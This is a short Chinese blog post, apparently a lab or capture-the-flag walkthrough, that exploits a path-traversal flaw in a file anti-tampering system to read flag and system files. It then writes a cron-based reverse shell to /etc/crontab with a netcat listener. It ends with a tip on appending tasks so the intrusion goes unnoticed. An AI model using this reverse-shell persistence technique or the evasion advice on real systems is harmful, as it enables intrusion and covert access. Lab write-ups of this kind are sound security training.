【好靶场】哎,一个文件防篡改系统

张开发
2026/4/7 16:28:41 15 分钟阅读

分享文章

【好靶场】哎,一个文件防篡改系统
主页有提供账号密码可以直接登录随便填写一点东西可以看到下面会出现我们刚刚发布的东西点击可以查看内容这里有点感觉是文件包含漏洞的感觉但是后续写入php的代码并没有执行路径穿越获取flag但是在【文件中心】也可以查看文件内容看到它这个路径久很明显的文件路径发送到burp验证下的确存在路径穿越那么我们直接读取/tmp/flag.txt的内容得到flag这里补充一点我们除了探测/etc/passwd还可以探测其他linux的常见路径具体可以看看Burp插件xia_Liao插件任务计划反弹shell获取flag既然存在存在路径穿越那么【文件发布】中的文件名是否也可以进行穿越看到的确是可以的那么我们可以通过覆盖Linux的任务计划实现反弹shell命令如下IP地址得是公网的vps* * * * * root /bin/bash -c /bin/bash -i /dev/tcp/192.168.1.1/8888 01写入到/etc/crontab成功写入我们的vps要开启监听nc -lvnp 8888大概一分钟久可以得到shell得到flag在实际过程中最好先读取linux中的任务计划有哪些然后进行追加反弹shell的计划任务避免影响别人正常业务也可以避免被发现

更多文章